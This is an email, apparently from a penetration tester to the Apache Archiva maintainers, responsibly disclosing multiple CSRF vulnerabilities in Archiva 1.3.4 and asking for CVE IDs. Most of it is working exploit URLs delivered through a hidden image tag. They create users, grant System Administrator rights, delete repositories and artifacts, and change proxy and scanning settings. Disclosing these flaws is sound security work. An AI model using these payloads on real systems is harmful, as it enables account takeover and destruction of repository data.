Hi, The latest version of Archiva (1.3.4) is also vulnerable to multiple CSRF issues. The following are the details and exploit code. Please confirm this mail and revert with an update. I will be disclosing this to the security community after the issues have been fixed.
Project: Archiva Severity: Critical Versions: 1.3.4 (other versions may be affected) Exploit type: Multiple CSRF CSRF: An attacker can build a simple html page containing a hidden Image tag (eg: <img src=vulnurl width=0 height=0 />) and entice the administrator to access the page resulting in the following issues: 1. An attacker can create a new user using the administrator's session: http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.use rname=tester123&user.fullName=test&user.email=test%40test.com&user.passw ord=abc&user.confirmPassword=abc 2. An attacker can delete a user: http://127.0.0.1:8080/archiva/security/userdelete!submit.action?username =test 3. An attacker can elevate privileges of accounts: http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=t est&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_a ddNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrato r&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSel ectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repos itory+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&s ubmitRolesButton=Submit 4. An attacker can delete the Configuration and contents along with the repository: http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&; method%3AdeleteContents=Delete+Configuration+and+Contents 5. An attacker can delete an artifact from any repository: http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&a rtifactId=1&version=1&repositoryId=snapshots 6. An attacker can add a Repository Group: http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repository Group.id=csrfgrp 7. An attacker can delete a repository Group: http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGro upId=test&method%3Adelete=Confirm 8. An attacker can disable Proxy connectors: http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action ?target=maven2-repository.dev.java.net&source=internal 9. An attacker can Delete proxy connectors: http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?t arget=maven2-repository.dev.java.net&source=snapshots 10. An attacker can delete Legacy Artifact Path under Legacy Support: http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path =jaxen%2Fjars%2Fjaxen-1.0-FCS-full.jar 11. An attacker can create a New Network Proxy configuration: http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&pro xy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.us ername=&proxy.password= 12. An attacker can delete an existing network proxy configuration: http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?pro xyid=myproxy 13. An attacker can add custom file extensions to the repository scanning page: http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePatter n.action?pattern=**%2F*.rum&fileTypeId=artifacts 14. An attacker can remove an existing file extension from the repository scanning page: http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePat tern.action?pattern=**%2F*.rum&fileTypeId=artifacts 15. An attacker can change the settings on the Known Consumers section: http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsum ers.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentC onsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksu ms&enabledKnownContentConsumers=index-content&enabledKnownContentConsume rs=metadata-updater&enabledKnownContentConsumers=repository-purge&enable dKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=v alidate-checksums 16. An attacker can enable/disable Unprocessed Consumer settings: http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers. action?enabledUnprocessedConsumers=update-db-project 17. An attacker can change settings on the Cleanup Consumers section: http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.acti on?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanup Consumers=not-present-remove-db-project&enabledCleanupConsumers=not-pres ent-remove-indexed I would request you to provide CVE-IDs for the vulnerabilities so that I can co-ordinate a full disclosure after these issues are fixed. Warm Regards, Riyaz Ahemed Walikar || Senior Engineer - Professional Services Vulnerability Assessment & Penetration Testing Mobile: +91-98860-42242 || Extn: 5601 The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, re-transmission, dissemination or other use of or taking of any action in reliance upon,this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from your computer. Microland takes all reasonable steps to ensure that its electronic communications are free from viruses. However, given Internet accessibility, the Company cannot accept liability for any virus introduced by this e-mail or any attachment and you are advised to use up-to-date virus checking software.
